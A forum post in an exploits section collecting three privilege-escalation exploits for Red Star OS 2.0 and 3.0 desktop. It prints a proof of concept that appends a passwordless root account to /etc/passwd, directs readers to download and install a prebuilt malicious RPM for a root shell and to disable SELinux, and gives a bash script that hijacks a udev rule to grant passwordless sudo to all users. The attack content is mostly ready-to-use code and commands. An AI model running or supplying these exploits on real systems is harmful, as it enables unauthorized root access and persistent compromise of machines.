Jump to content
Aerosol

RedStar 2.0 / 3.0 Desktop Multiple Vulnerability

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted

RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)

Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit"
which can be abused to execute commands on
boot. An example exploitation of this vulnerability is shown here
https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png

PoC:

/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
su - root


## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6

Source

RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)

The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. 
UnFortunately, they left a big security hole: the Software Manager (swmng.app), 
which runs as root through sudo and will install any RPM package, even if unsigned.

To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key,
double-click it to open it with the Software Manager, and click through the blue buttons until it’s done.
After that, run rootsh to get a root shell. 
Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things, 
but disabling it is a matter of running setenforce 0 as root.


Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
Mirror: http://www.exploit-db.com/sploits/redstarroot.rpm


## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1

Source

RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)

#!/bin/bash -e
cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
cat <<EOF >/tmp/r00t.sh
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
rm /tmp/r00t.sh
EOF
chmod +x /tmp/r00t.sh
echo "sudo will be available after reboot"
sleep 2
reboot

## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6

Source

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...